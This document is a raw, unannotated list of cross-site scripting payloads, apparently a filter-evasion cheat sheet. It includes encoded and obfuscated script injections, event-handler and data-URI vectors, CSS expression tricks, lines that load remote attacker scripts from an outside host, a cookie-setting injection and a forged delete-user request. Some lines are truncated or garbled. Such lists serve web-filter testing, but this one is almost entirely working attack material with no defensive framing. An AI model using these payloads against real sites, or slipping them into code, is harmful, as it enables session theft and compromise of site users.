/=%2F\n\u003cscript/src=data\u0026colon;text/j\\u0061v\\u0061\u0026#115\u0026#99\u0026#114\u0026#105\u0026#112\u0026#116,\\u0061%6C%65%72%74(/XSS/)\u003e\u003c/script\n\n\u003cobject data=javascript\u0026colon;\\u0061\u0026#x6C;\u0026#101%72t(1)\u003e\n\n\u003cscript\u003e+-+-1-+-+alert(1)\u003c/script\u003e\n\n\u003cbody/onload=\u0026lt;!--\u0026gt;\u0026#10alert(1)\u003e\n\n\u003cscript itworksinallbrowsers\u003e/*\u003cscript* */alert(1)\u003c/script\n\n\u003cimg src ?itworksonchrome?\\/onerror = alert(1)\n\n\u003csvg\u003e\u003cscript\u003e//\u0026NewLine;confirm(1);\u003c/script \u003c/svg\u003e\n\u003csvg\u003e\u003cscript onlypossibleinopera:-)\u003e alert(1)\n\n\u003ca aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j\u0026#97v\u0026#97script\u0026#x3A;\u0026#97lert(1)\u003eClickMe\n\n\u003cscript x\u003e alert(1) \u003c/script 1=2\n\n\u003cdiv/onmouseover='alert(1)'\u003e style=\"x:\"\u003e\n\n\u003c--`\u003cimg/src=` onerror=alert(1)\u003e --!\u003e\n \u003cscript/src=\u0026#100\u0026#97\u0026#116\u0026#97:text/\u0026#x6a\u0026#x61\u0026#x76\u0026#x61\u0026#x73\u0026#x63\u0026#x72\u0026#x69\u0026#x000070\u0026#x074,\u0026#x0061;\u0026#x06c;\u0026#x0065;\u0026#x00000072;\u0026#x00074;(1)\u003e\u003c/script\u003e\n\n\u003cdiv style=\"xg-p:absolute;top:0;left:0;width:100%;height:100%\" onmouseover=\"prompt(1)\" onclick=\"alert(1)\"\u003ex\u003c/button\u003e\n\n\"\u003e\u003cimg src=x onerror=window.open('https://www.google.com/');\u003e\n\n\u003cform\u003e\u003cbutton formaction=javascript\u0026colon;alert(1)\u003eCLICKME\n\n\u003cmath\u003e\u003ca xlink:href=\"//jsfiddle.net/t846h/\"\u003eclick\n\n\u003cobject data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+\u003e\u003c/object\u003e\n\n\u003ciframe src=\"data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E\"\u003e\u003c/iframe\u003e\n\n\u003ca href=\"data:text/html;blabla,\u0026#60\u0026#115\u0026#99\u0026#114\u0026#105\u0026#112\u0026#116\u0026#32\u0026#115\u0026#114\u0026#99\u0026#61\u0026#34\u0026#104\u0026#116\u0026#116\u0026#112\u0026#58\u0026#47\u0026#47\u0026#115\u0026#116\u0026#101\u0026#114\u0026#110\u0026#101\u0026#102\u0026#97\u0026#109\u0026#105\u0026#108\u0026#121\u0026#46\u0026#110\u0026#101\u0026#116\u0026#47\u0026#102\u0026#111\u0026#111\u0026#46\u0026#106\u0026#115\u0026#34\u0026#62\u0026#60\u0026#47\u0026#115\u0026#99\u0026#114\u0026#105\u0026#112\u0026#116\u0026#62\u0026#8203\"\u003eClick Me\u003c/a\u003e\n\n\u003cSCRIPT\u003eString.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41)\u003c/SCRIPT\u003e\n�;alert(String.fromCharCode(88,83,83))//�;alert(String.fromCharCode(88,83,83))//�;alert(String.fromCharCode(88,83,83))//�;alert(String.fromCharCode(88,83,83))//�\u003e\u003c/SCRIPT\u003e�\u003e�\u003e\u003cSCRIPT\u003ealert(String.fromCharCode(88,83,83))\u003c/SCRIPT\u003e\n\u003cIMG ���\u003e\u003cSCRIPT\u003ealert(�XSS�)\u003c/SCRIPT\u003e�\u003e\n\u003cIMG SRC=javascript:alert(String.fromCharCode(88,83,83))\u003e\n\u003cIMG SRC=�jav ascript:alert(�XSS�);�\u003e\n\u003cIMG SRC=�jav\u0026#x09;ascript:alert(�XSS�);�\u003e\n\u003c\u003cSCRIPT\u003ealert(�XSS�);//\u003c\u003c/SCRIPT\u003e\n%253cscript%253ealert(1)%253c/script%253e\n�\u003e\u003cs�%2b�cript\u003ealert(document.cookie)\u003c/script\u003e\nfoo\u003cscript\u003ealert(1)\u003c/script\u003e\n\u003cscr\u003cscript\u003eipt\u003ealert(1)\u003c/scr\u003c/script\u003eipt\u003e\n\u003cIMG SRC=\u0026#106;\u0026#97;\u0026#118;\u0026#97;\u0026#115;\u0026#99;\u0026#114;\u0026#105;\u0026#112;\u0026#116;\u0026#58;\u0026#97;\u0026#108;\u0026#101;\u0026#114;\u0026#116;\u0026#40;\u0026#39;\u0026#88;\u0026#83;\u0026#83;\u0026#39;\u0026#41;\u003e\n\u003cIMG SRC=\u0026#0000106\u0026#0000097\u0026#0000118\u0026#0000097\u0026#0000115\u0026#0000099\u0026#0000114\u0026#0000105\u0026#0000112\u0026#0000116\u0026#0000058\u0026#0000097\u0026#0000108\u0026#0000101\u0026#0000114\u0026#0000116\u0026#0000040\u0026#0000039\u0026#0000088\u0026#0000083\u0026#0000083\u0026#0000039\u0026#0000041\u003e\n\u003cIMG SRC=\u0026#x6A\u0026#x61\u0026#x76\u0026#x61\u0026#x73\u0026#x63\u0026#x72\u0026#x69\u0026#x70\u0026#x74\u0026#x3A\u0026#x61\u0026#x6C\u0026#x65\u0026#x72\u0026#x74\u0026#x28\u0026#x27\u0026#x58\u0026#x53\u0026#x53\u0026#x27\u0026#x29\u003e\n\u003cBODY BACKGROUND=�javascript:alert(�XSS�)�\u003e\n\u003cBODY ONLOAD=alert(�XSS�)\u003e\n\u003cINPUT TYPE=�IMAGE� SRC=�javascript:alert(�XSS�);�\u003e\n\u003cIMG SRC=�javascript:alert(�XSS�)�\n\u003ciframe src=http://ha.ckers.org/scriptlet.html \u003c\njavascript:alert(\"hellox worldss\")\n\u003cimg src=\"javascript:alert('XSS');\"\u003e\n\u003cimg src=javascript:alert(\u0026quot;XSS\u0026quot;)\u003e\n\u003c\"';alert(String.fromCharCode(88,83,83))//\\';alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//\\\";alert(String.fromCharCode(88,83,83))//--\u003e\u003c/SCRIPT\u003e\"\u003e'\u003e\u003cSCRIPT\u003ealert(String.fromCharCode(88,83,83))\u003c/SCRIPT\u003e\n\u003cMETA HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\"\u003e\n\u003cIFRAME SRC=\"javascript:alert('XSS');\"\u003e\u003c/IFRAME\u003e\n\u003cEMBED SRC=\"data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==\" type=\"image/svg+xml\" AllowScriptAccess=\"always\"\u003e\u003c/EMBED\u003e\n\u003cSCRIPT a=\"\u003e\" SRC=\"http://ha.ckers.org/xss.js\"\u003e\u003c/SCRIPT\u003e\n\u003cSCRIPT a=\"\u003e\" '' SRC=\"http://ha.ckers.org/xss.js\"\u003e\u003c/SCRIPT\u003e\n\u003cSCRIPT \"a='\u003e'\" SRC=\"http://ha.ckers.org/xss.js\"\u003e\u003c/SCRIPT\u003e\n\u003cSCRIPT a=\"\u003e'\u003e\" SRC=\"http://ha.ckers.org/xss.js\"\u003e\u003c/SCRIPT\u003e\n\u003cSCRIPT\u003edocument.write(\"\u003cSCRI\");\u003c/SCRIPT\u003ePT SRC=\"http://ha.ckers.org/xss.js\"\u003e\u003c/SCRIPT\u003e\n\u003c\u003cSCRIPT\u003ealert(\"XSS\");//\u003c\u003c/SCRIPT\u003e\n\u003c\"';alert(String.fromCharCode(88,83,83))//\\';alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//\\\";alert(String.fromCharCode(88,83,83))//--\u003e\u003c/SCRIPT\u003e\"\u003e'\u003e\u003cSCRIPT\u003ealert(String.fromCharCode(88,83,83))\u003c/SCRIPT\u003e\n';alert(String.fromCharCode(88,83,83))//\\';alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//\\\";alert(String.fromCharCode(88,83,83))//--\u003e\u003c/SCRIPT\u003e\"\u003e'\u003e\u003cSCRIPT\u003ealert(String.fromCharCode(88,83,83))\u003c?/SCRIPT\u003e\u0026submit.x=27\u0026submit.y=9\u0026cmd=search\n\u003cscript\u003ealert(\"hellox worldss\")\u003c/script\u003e\u0026safe=high\u0026cx=006665157904466893121:su_tzknyxug\u0026cof=FORID:9#510\n\u003cscript\u003ealert(\"XSS\");\u003c/script\u003e\u0026search=1\n0\u0026q=';alert(String.fromCharCode(88,83,83))//\\';alert%2?8String.fromCharCode(88,83,83))//\";alert(String.fromCharCode?(88,83,83))//\\\";alert(String.fromCharCode(88,83,83)%?29//--\u003e\u003c/SCRIPT\u003e\"\u003e'\u003e\u003cSCRIPT\u003ealert(String.fromCharCode(88,83%?2C83))\u003c/SCRIPT\u003e\u0026submit-frmGoogleWeb=Web+Search\n\u003ch1\u003e\u003cfont color=blue\u003ehellox worldss\u003c/h1\u003e\n\u003cBODY ONLOAD=alert('hellox worldss')\u003e\n\u003cinput onfocus=write(XSS) autofocus\u003e\n\u003cinput onblur=write(XSS) autofocus\u003e\u003cinput autofocus\u003e\n\u003cbody onscroll=alert(XSS)\u003e\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e...\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e\u003cinput autofocus\u003e\n\u003cform\u003e\u003cbutton formaction=\"javascript:alert(XSS)\"\u003elol\n\u003c!--\u003cimg src=\"--\u003e\u003cimg src=x onerror=alert(XSS)//\"\u003e\n\u003c![\u003e\u003cimg src=\"]\u003e\u003cimg src=x onerror=alert(XSS)//\"\u003e\n\u003cstyle\u003e\u003cimg src=\"\u003c/style\u003e\u003cimg src=x onerror=alert(XSS)//\"\u003e\n\u003c? foo=\"\u003e\u003cscript\u003ealert(1)\u003c/script\u003e\"\u003e\n\u003c! foo=\"\u003e\u003cscript\u003ealert(1)\u003c/script\u003e\"\u003e\n\u003c/ foo=\"\u003e\u003cscript\u003ealert(1)\u003c/script\u003e\"\u003e\n\u003c? foo=\"\u003e\u003cx foo='?\u003e\u003cscript\u003ealert(1)\u003c/script\u003e'\u003e\"\u003e\n\u003c! foo=\"[[[Inception]]\"\u003e\u003cx foo=\"]foo\u003e\u003cscript\u003ealert(1)\u003c/script\u003e\"\u003e\n\u003c% foo\u003e\u003cx foo=\"%\u003e\u003cscript\u003ealert(123)\u003c/script\u003e\"\u003e\n\u003cdiv style=\"font-family:'foo\u0026#10;;color:red;';\"\u003eLOL\nLOL\u003cstyle\u003e*{/*all*/color/*all*/:/*all*/red/*all*/;/[0]*IE,Safari*[0]/color:green;color:bl/*IE*/ue;}\u003c/style\u003e\n\u003cscript\u003e({0:#0=alert/#0#/#0#(0)})\u003c/script\u003e\n\u003csvg xmlns=\"http://www.w3.org/2000/svg\"\u003eLOL\u003cscript\u003ealert(123)\u003c/script\u003e\u003c/svg\u003e\n\u0026lt;SCRIPT\u0026gt;alert(/XSS/\u0026#46;source)\u0026lt;/SCRIPT\u0026gt;\n\\\\\";alert('XSS');//\n\u0026lt;/TITLE\u0026gt;\u0026lt;SCRIPT\u0026gt;alert(\\\"XSS\\\");\u0026lt;/SCRIPT\u0026gt;\n\u0026lt;INPUT TYPE=\\\"IMAGE\\\" SRC=\\\"javascript\u0026#058;alert('XSS');\\\"\u0026gt;\n\u0026lt;BODY BACKGROUND=\\\"javascript\u0026#058;alert('XSS')\\\"\u0026gt;\n\u0026lt;BODY ONLOAD=alert('XSS')\u0026gt;\n\u0026lt;IMG DYNSRC=\\\"javascript\u0026#058;alert('XSS')\\\"\u0026gt;\n\u0026lt;IMG LOWSRC=\\\"javascript\u0026#058;alert('XSS')\\\"\u0026gt;\n\u0026lt;BGSOUND SRC=\\\"javascript\u0026#058;alert('XSS');\\\"\u0026gt;\n\u0026lt;BR SIZE=\\\"\u0026{alert('XSS')}\\\"\u0026gt;\n\u0026lt;LAYER SRC=\\\"http\u0026#58;//ha\u0026#46;ckers\u0026#46;org/scriptlet\u0026#46;html\\\"\u0026gt;\u0026lt;/LAYER\u0026gt;\n\u0026lt;LINK REL=\\\"stylesheet\\\" HREF=\\\"javascript\u0026#058;alert('XSS');\\\"\u0026gt;\n\u0026lt;LINK REL=\\\"stylesheet\\\" HREF=\\\"http\u0026#58;//ha\u0026#46;ckers\u0026#46;org/xss\u0026#46;css\\\"\u0026gt;\n\u0026lt;STYLE\u0026gt;@import'http\u0026#58;//ha\u0026#46;ckers\u0026#46;org/xss\u0026#46;css';\u0026lt;/STYLE\u0026gt;\n\u0026lt;META HTTP-EQUIV=\\\"Link\\\" Content=\\\"\u0026lt;http\u0026#58;//ha\u0026#46;ckers\u0026#46;org/xss\u0026#46;css\u0026gt;; REL=stylesheet\\\"\u0026gt;\n\u0026lt;STYLE\u0026gt;BODY{-moz-binding\u0026#58;url(\\\"http\u0026#58;//ha\u0026#46;ckers\u0026#46;org/xssmoz\u0026#46;xml#xss\\\")}\u0026lt;/STYLE\u0026gt;\n\u0026lt;XSS STYLE=\\\"behavior\u0026#58; url(xss\u0026#46;htc);\\\"\u0026gt;\n\u0026lt;STYLE\u0026gt;li {list-style-image\u0026#58; url(\\\"javascript\u0026#058;alert('XSS')\\\");}\u0026lt;/STYLE\u0026gt;\u0026lt;UL\u0026gt;\u0026lt;LI\u0026gt;XSS\n\u0026lt;IMG SRC='vbscript\u0026#058;msgbox(\\\"XSS\\\")'\u0026gt;\n\u0026lt;IMG SRC=\\\"mocha\u0026#58;\u0026#91;code\u0026#93;\\\"\u0026gt;\n\u0026lt;IMG SRC=\\\"livescript\u0026#058;\u0026#91;code\u0026#93;\\\"\u0026gt;\n�scriptualert(EXSSE)�/scriptu\n\u0026lt;META HTTP-EQUIV=\\\"refresh\\\" CONTENT=\\\"0;url=javascript\u0026#058;alert('XSS');\\\"\u0026gt;\n\u0026lt;META HTTP-EQUIV=\\\"refresh\\\" CONTENT=\\\"0;url=data\u0026#58;text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\\\"\u0026gt;\n\u0026lt;META HTTP-EQUIV=\\\"refresh\\\" CONTENT=\\\"0; URL=http\u0026#58;//;URL=javascript\u0026#058;alert('XSS');\\\"\n\u0026lt;IFRAME SRC=\\\"javascript\u0026#058;alert('XSS');\\\"\u0026gt;\u0026lt;/IFRAME\u0026gt;\n\u0026lt;FRAMESET\u0026gt;\u0026lt;FRAME SRC=\\\"javascript\u0026#058;alert('XSS');\\\"\u0026gt;\u0026lt;/FRAMESET\u0026gt;\n\u0026lt;TABLE BACKGROUND=\\\"javascript\u0026#058;alert('XSS')\\\"\u0026gt;\n\u0026lt;TABLE\u0026gt;\u0026lt;TD BACKGROUND=\\\"javascript\u0026#058;alert('XSS')\\\"\u0026gt;\n\u0026lt;DIV STYLE=\\\"background-image\u0026#58; url(javascript\u0026#058;alert('XSS'))\\\"\u0026gt;\n\u0026lt;DIV STYLE=\\\"background-image\u0026#58;\\0075\\0072\\006C\\0028'\\006a\\0061\\0076\\0061\\0073\\0063\\0072\\0069\\0070\\0074\\003a\\0061\\006c\\0065\\0072\\0074\\0028\u0026#46;1027\\0058\u0026#46;1053\\0053\\0027\\0029'\\0029\\\"\u0026gt;\n\u0026lt;DIV STYLE=\\\"background-image\u0026#58; url(javascript\u0026#058;alert('XSS'))\\\"\u0026gt;\n\u0026lt;DIV STYLE=\\\"width\u0026#58; expression(alert('XSS'));\\\"\u0026gt;\n\u0026lt;STYLE\u0026gt;@im\\port'\\ja\\vasc\\ript\u0026#58;alert(\\\"XSS\\\")';\u0026lt;/STYLE\u0026gt;\n\u0026lt;IMG STYLE=\\\"xss\u0026#58;expr/*XSS*/ession(alert('XSS'))\\\"\u0026gt;\n\u0026lt;XSS STYLE=\\\"xss\u0026#58;expression(alert('XSS'))\\\"\u0026gt;\nexp/*\u0026lt;A STYLE='no\\xss\u0026#58;noxss(\\\"*//*\\\");\nxss\u0026#58;ex\u0026#x2F;*XSS*//*/*/pression(alert(\\\"XSS\\\"))'\u0026gt;\n\u0026lt;STYLE TYPE=\\\"text/javascript\\\"\u0026gt;alert('XSS');\u0026lt;/STYLE\u0026gt;\n\u0026lt;STYLE\u0026gt;\u0026#46;XSS{background-image\u0026#58;url(\\\"javascript\u0026#058;alert('XSS')\\\");}\u0026lt;/STYLE\u0026gt;\u0026lt;A CLASS=XSS\u0026gt;\u0026lt;/A\u0026gt;\n\u0026lt;STYLE type=\\\"text/css\\\"\u0026gt;BODY{background\u0026#58;url(\\\"javascript\u0026#058;alert('XSS')\\\")}\u0026lt;/STYLE\u0026gt;\n\u0026lt;!--\u0026#91;if gte IE 4\u0026#93;\u0026gt;\n\u0026lt;SCRIPT\u0026gt;alert('XSS');\u0026lt;/SCRIPT\u0026gt;\n\u0026lt;!\u0026#91;endif\u0026#93;--\u0026gt;\n\u0026lt;BASE HREF=\\\"javascript\u0026#058;alert('XSS');//\\\"\u0026gt;\n\u0026lt;OBJECT TYPE=\\\"text/x-scriptlet\\\" DATA=\\\"http\u0026#58;//ha\u0026#46;ckers\u0026#46;org/scriptlet\u0026#46;html\\\"\u0026gt;\u0026lt;/OBJECT\u0026gt;\n\u0026lt;OBJECT classid=clsid\u0026#58;ae24fdae-03c6-11d1-8b76-0080c744f389\u0026gt;\u0026lt;param name=url value=javascript\u0026#058;alert('XSS')\u0026gt;\u0026lt;/OBJECT\u0026gt;\n\u0026lt;EMBED SRC=\\\"http\u0026#58;//ha\u0026#46;ckers\u0026#46;org/xss\u0026#46;swf\\\" AllowScriptAccess=\\\"always\\\"\u0026gt;\u0026lt;/EMBED\u0026gt;\n\u0026lt;EMBED SRC=\\\"data\u0026#58;image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==\\\" type=\\\"image/svg+xml\\\" AllowScriptAccess=\\\"always\\\"\u0026gt;\u0026lt;/EMBED\u0026gt;\na=\\\"get\\\";\nb=\\\"URL(\\\\\"\\\";\nc=\\\"javascript\u0026#058;\\\";\nd=\\\"alert('XSS');\\\\\")\\\";\neval(a+b+c+d);\n\u0026lt;HTML xmlns\u0026#58;xss\u0026gt;\u0026lt;?import namespace=\\\"xss\\\" implementation=\\\"http\u0026#58;//ha\u0026#46;ckers\u0026#46;org/xss\u0026#46;htc\\\"\u0026gt;\u0026lt;xss\u0026#58;xss\u0026gt;XSS\u0026lt;/xss\u0026#58;xss\u0026gt;\u0026lt;/HTML\u0026gt;\n\u0026lt;XML ID=I\u0026gt;\u0026lt;X\u0026gt;\u0026lt;C\u0026gt;\u0026lt;!\u0026#91;CDATA\u0026#91;\u0026lt;IMG SRC=\\\"javas\u0026#93;\u0026#93;\u0026gt;\u0026lt;!\u0026#91;CDATA\u0026#91;cript\u0026#58;alert('XSS');\\\"\u0026gt;\u0026#93;\u0026#93;\u0026gt;\n\u0026lt;/C\u0026gt;\u0026lt;/X\u0026gt;\u0026lt;/xml\u0026gt;\u0026lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML\u0026gt;\u0026lt;/SPAN\u0026gt;\n\u0026lt;XML ID=\\\"xss\\\"\u0026gt;\u0026lt;I\u0026gt;\u0026lt;B\u0026gt;\u0026lt;IMG SRC=\\\"javas\u0026lt;!-- --\u0026gt;cript\u0026#58;alert('XSS')\\\"\u0026gt;\u0026lt;/B\u0026gt;\u0026lt;/I\u0026gt;\u0026lt;/XML\u0026gt;\n\u0026lt;SPAN DATASRC=\\\"#xss\\\" DATAFLD=\\\"B\\\" DATAFORMATAS=\\\"HTML\\\"\u0026gt;\u0026lt;/SPAN\u0026gt;\n\u0026lt;XML SRC=\\\"xsstest\u0026#46;xml\\\" ID=I\u0026gt;\u0026lt;/XML\u0026gt;\n\u0026lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML\u0026gt;\u0026lt;/SPAN\u0026gt;\n\u0026lt;HTML\u0026gt;\u0026lt;BODY\u0026gt;\n\u0026lt;?xml\u0026#58;namespace prefix=\\\"t\\\" ns=\\\"urn\u0026#58;schemas-microsoft-com\u0026#58;time\\\"\u0026gt;\n\u0026lt;?import namespace=\\\"t\\\" implementation=\\\"#default#time2\\\"\u0026gt;\n\u0026lt;t\u0026#58;set attributeName=\\\"innerHTML\\\" to=\\\"XSS\u0026lt;SCRIPT DEFER\u0026gt;alert(\u0026quot;XSS\u0026quot;)\u0026lt;/SCRIPT\u0026gt;\\\"\u0026gt;\n\u0026lt;/BODY\u0026gt;\u0026lt;/HTML\u0026gt;\n\u0026lt;SCRIPT SRC=\\\"http\u0026#58;//ha\u0026#46;ckers\u0026#46;org/xss\u0026#46;jpg\\\"\u0026gt;\u0026lt;/SCRIPT\u0026gt;\n\u0026lt;!--#exec cmd=\\\"/bin/echo '\u0026lt;SCR'\\\"--\u0026gt;\u0026lt;!--#exec cmd=\\\"/bin/echo 'IPT SRC=http\u0026#58;//ha\u0026#46;ckers\u0026#46;org/xss\u0026#46;js\u0026gt;\u0026lt;/SCRIPT\u0026gt;'\\\"--\u0026gt;\n\u0026lt;? echo('\u0026lt;SCR)';\necho('IPT\u0026gt;alert(\\\"XSS\\\")\u0026lt;/SCRIPT\u0026gt;'); ?\u0026gt;\n\u0026lt;IMG SRC=\\\"http\u0026#58;//www\u0026#46;thesiteyouareon\u0026#46;com/somecommand\u0026#46;php?somevariables=maliciouscode\\\"\u0026gt;\nRedirect 302 /a\u0026#46;jpg http\u0026#58;//victimsite\u0026#46;com/admin\u0026#46;asp\u0026deleteuser\n\u0026lt;META HTTP-EQUIV=\\\"Set-Cookie\\\" Content=\\\"USERID=\u0026lt;SCRIPT\u0026gt;alert('XSS')\u0026lt;/SCRIPT\u0026gt;\\\"\u0026gt;\n\u0026lt;HEAD\u0026gt;\u0026lt;META HTTP-EQUIV=\\\"CONTENT-TYPE\\\" CONTENT=\\\"text/html; charset=UTF-7\\\"\u0026gt; \u0026lt;/HEAD\u0026gt;+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-\n\u0026lt;SCRIPT a=\\\"\u0026gt;\\\" SRC=\\\"http\u0026#58;//ha\u0026#46;ckers\u0026#46;org/xss\u0026#46;js\\\"\u0026gt;\u0026lt;/SCRIPT\u0026gt;\n\u0026lt;SCRIPT =\\\"\u0026gt;\\\" SRC=\\\"http\u0026#58;//ha\u0026#46;ckers\u0026#46;org/xss\u0026#46;js\\\"\u0026gt;\u0026lt;/SCRIPT\u0026gt;\n\u0026lt;SCRIPT a=\\\"\u0026gt;\\\" '' SRC=\\\"http\u0026#58;//ha\u0026#46;ckers\u0026#46;org/xss\u0026#46;js\\\"\u0026gt;\u0026lt;/SCRIPT\u0026gt;\n\u0026lt;SCRIPT \\\"a='\u0026gt;'\\\" SRC=\\\"http\u0026#58;//ha\u0026#46;ckers\u0026#46;org/xss\u0026#46;js\\\"\u0026gt;\u0026lt;/SCRIPT\u0026gt;\n\u0026lt;SCRIPT a=`\u0026gt;` SRC=\\\"http\u0026#58;//ha\u0026#46;ckers\u0026#46;org/xss\u0026#46;js\\\"\u0026gt;\u0026lt;/SCRIPT\u0026gt;\n\u0026lt;SCRIPT a=\\\"\u0026gt;'\u0026gt;\\\" SRC=\\\"http\u0026#58;//ha\u0026#46;ckers\u0026#46;org/xss\u0026#46;js\\\"\u0026gt;\u0026lt;/SCRIPT\u0026gt;\n\u0026lt;SCRIPT\u0026gt;document\u0026#46;write(\\\"\u0026lt;SCRI\\\");\u0026lt;/SCRIPT\u0026gt;PT SRC=\\\"http\u0026#58;//ha\u0026#46;ckers\u0026#46;org/xss\u0026#46;js\\\"\u0026gt;\u0026lt;/SCRIPT\u0026gt;\n\u0026lt;A HREF=\\\"http\u0026#58;//66\u0026#46;102\u0026#46;7\u0026#46;147/\\\"\u0026gt;XSS\u0026lt;/A\u0026gt;\n\u0026lt;A HREF=\\\"http\u0026#58;//%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D\\\"\u0026gt;XSS\u0026lt;/A\u0026gt;\n\u0026lt;A HREF=\\\"http\u0026#58;//1113982867/\\\"\u0026gt;XSS\u0026lt;/A\u0026gt;\n\u0026lt;A HREF=\\\"http\u0026#58;//0x42\u0026#46;0x0000066\u0026#46;0x7\u0026#46;0x93/\\\"\u0026gt;XSS\u0026lt;/A\u0026gt;\n\u0026lt;A HREF=\\\"http\u0026#58;//0102\u0026#46;0146\u0026#46;0007\u0026#46;00000223/\\\"\u0026gt;XSS\u0026lt;/A\u0026gt;\n\u0026lt;A HREF=\\\"htt p\u0026#58;//6 6\u0026#46;000146\u0026#46;0x7\u0026#46;147/\\\"\u0026gt;XSS\u0026lt;/A\u0026gt;\n\u0026lt;A HREF=\\\"//www\u0026#46;google\u0026#46;com/\\\"\u0026gt;XSS\u0026lt;/A\u0026gt;\n\u0026lt;A HREF=\\\"//google\\\"\u0026gt;XSS\u0026lt;/A\u0026gt;\n\u0026lt;A HREF=\\\"http\u0026#58;//ha\u0026#46;ckers\u0026#46;org@google\\\"\u0026gt;XSS\u0026lt;/A\u0026gt;\n\u0026lt;A HREF=\\\"http\u0026#58;//google\u0026#58;ha\u0026#46;ckers\u0026#46;org\\\"\u0026gt;XSS\u0026lt;/A\u0026gt;\n\u0026lt;A HREF=\\\"http\u0026#58;//google\u0026#46;com/\\\"\u0026gt;XSS\u0026lt;/A\u0026gt;\n\u0026lt;A HREF=\\\"http\u0026#58;//www\u0026#46;google\u0026#46;com\u0026#46;/\\\"\u0026gt;XSS\u0026lt;/A\u0026gt;\n\u0026lt;A HREF=\\\"javascript\u0026#058;document\u0026#46;location='http\u0026#58;//www\u0026#46;google\u0026#46;com/'\\\"\u0026gt;XSS\u0026lt;/A\u0026gt;\n\u0026lt;A HREF=\\\"http\u0026#58;//www\u0026#46;gohttp\u0026#58;//www\u0026#46;google\u0026#46;com/ogle\u0026#46;com/\\\"\u0026gt;XSS\u0026lt;/A\u0026gt;\n\u0026lt;\n%3C\n\u0026lt\n\u0026lt;\n\u0026LT\n\u0026LT;\n\u0026#60\n\u0026#060\n\u0026#0060\n\u0026#00060\n\u0026#000060\n\u0026#0000060\n\u0026lt;\n\u0026#x3c\n\u0026#x03c\n\u0026#x003c\n\u0026#x0003c\n\u0026#x00003c\n\u0026#x000003c\n\u0026#x3c;\n\u0026#x03c;\n\u0026#x003c;\n\u0026#x0003c;\n\u0026#x00003c;\n\u0026#x000003c;\n\u0026#X3c\n\u0026#X03c\n\u0026#X003c\n\u0026#X0003c\n\u0026#X00003c\n\u0026#X000003c\n\u0026#X3c;\n\u0026#X03c;\n\u0026#X003c;\n\u0026#X0003c;\n\u0026#X00003c;\n\u0026#X000003c;\n\u0026#x3C\n\u0026#x03C\n\u0026#x003C\n\u0026#x0003C\n\u0026#x00003C\n\u0026#x000003C\n\u0026#x3C;\n\u0026#x03C;\n\u0026#x003C;\n\u0026#x0003C;\n\u0026#x00003C;\n\u0026#x000003C;\n\u0026#X3C\n\u0026#X03C\n\u0026#X003C\n\u0026#X0003C\n\u0026#X00003C\n\u0026#X000003C\n\u0026#X3C;\n\u0026#X03C;\n\u0026#X003C;\n\u0026#X0003C;\n\u0026#X00003C;\n\u0026#X000003C;\n\\x3c\n\\x3C\n\\u003c\n\\u003C\n\u0026lt;iframe src=http\u0026#58;//ha\u0026#46;ckers\u0026#46;org/scriptlet\u0026#46;html\u0026gt;\n\u0026lt;IMG SRC=\\\"javascript\u0026#058;alert('XSS')\\\"\n\u0026lt;SCRIPT SRC=//ha\u0026#46;ckers\u0026#46;org/\u0026#46;js\u0026gt;\n\u0026lt;SCRIPT SRC=http\u0026#58;//ha\u0026#46;ckers\u0026#46;org/xss\u0026#46;js?\u0026lt;B\u0026gt;\n\u0026lt;\u0026lt;SCRIPT\u0026gt;alert(\\\"XSS\\\");//\u0026lt;\u0026lt;/SCRIPT\u0026gt;\n\u0026lt;SCRIPT/SRC=\\\"http\u0026#58;//ha\u0026#46;ckers\u0026#46;org/xss\u0026#46;js\\\"\u0026gt;\u0026lt;/SCRIPT\u0026gt;\n\u0026lt;BODY onload!#$%\u0026()*~+-_\u0026#46;,\u0026#58;;?@\u0026#91;/|\\\u0026#93;^`=alert(\\\"XSS\\\")\u0026gt;\n\u0026lt;SCRIPT/XSS SRC=\\\"http\u0026#58;//ha\u0026#46;ckers\u0026#46;org/xss\u0026#46;js\\\"\u0026gt;\u0026lt;/SCRIPT\u0026gt;\n\u0026lt;IMG SRC=\\\"   